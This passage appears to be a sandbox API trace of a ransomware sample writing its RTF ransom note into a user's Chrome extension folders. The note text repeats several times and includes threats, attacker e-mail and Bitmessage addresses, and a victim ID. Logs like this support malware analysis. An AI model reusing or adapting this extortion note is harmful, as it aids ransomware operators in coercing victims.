AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nw̵\x94#Vç\x9f\x04Û\x03 6WZ\x83©{\x93Y(Á~\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.455] WriteFile (in: hFile=0x2ec, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.456] CloseHandle (hObject=0x2ec) returned 1 [0298.456] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0298.456] GetLastError () returned 0x2 [0298.456] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you 